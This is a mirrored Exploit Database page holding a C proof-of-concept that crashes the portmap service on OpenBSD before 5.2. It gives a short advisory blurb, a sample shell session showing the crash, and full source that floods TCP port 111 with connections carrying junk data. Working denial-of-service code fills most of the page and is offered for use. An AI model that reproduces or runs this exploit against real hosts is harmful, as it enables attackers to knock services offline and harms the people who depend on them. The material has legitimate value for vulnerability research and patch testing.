OpenBSD 4.x – Portmap Remote Denial of Service

• Exploit Database
• 159 阅读

• 作者： auto236751
  日期： 2012-11-22
• 类别：

  • dos
  平台：

  • bsd
• 来源：https://www.exploit-db.com/exploits/38059/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81

  // source: https://www.securityfocus.com/bid/56671/info   OpenBSD is prone to a remote denial-of-service vulnerability.   Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.   OpenBSD versions prior to 5.2 are vulnerable.   /* * authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466 *6e2d3d47576f746e9e65cb4d7f3aaa1519971189 *c8e74ebd8392fda4788179f9a02bb49337638e7b * *greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf *e4c0f3f28cf322779375b71f1c14d6f8308f789d *691cb088c45ec9e31823ca7ab0da8b4cf8079baf *b234a149e7ef00abc0f2ec7e6cf535ef4872eabc * * * -bash-4.2$ uname -a * OpenBSD obsd.my.domain 5.1 GENERIC#160 i386 * -bash-4.2$ id * uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) * -bash-4.2$ netstat -an -f inet | grep 111 * tcp00127.0.0.1.111*.*LISTEN * tcp00*.111*.*LISTEN * udp00127.0.0.1.111*.* * udp00*.111*.* * -bash-4.2$ gcc openbsd_libc_portmap.c * -bash-4.2$ ./a.out * [+] This code doesn&apos;t deserve 1337 status output. * [+] Trying to crash portmap on 127.0.0.1:111 * [+] 127.0.0.1:111 is now down. * */   #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h>   #define HOST "127.0.0.1" #define PORT 111 #define LOOP 0x100     int main(void) { int s, i; struct sockaddr_in saddr;   printf("[+] This code doesn&apos;t deserve 1337 status output.\n"); printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT);   saddr.sin_family = AF_INET; saddr.sin_port = htons(PORT); saddr.sin_addr.s_addr = inet_addr(HOST);   s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) { printf("[-] %s:%d is already down.\n", HOST, PORT); return EXIT_FAILURE; }   /* # of iteration needed varies but starts working for > 0x30*/ for(i=0; i < LOOP; ++i) { s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)); send(s, "8========@", 10, 0); }   if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) printf("[+] %s:%d is now down.\n", HOST, PORT); else printf("[-] %s:%d is still listening. Try to increase loop iterations...\n");   return EXIT_SUCCESS; }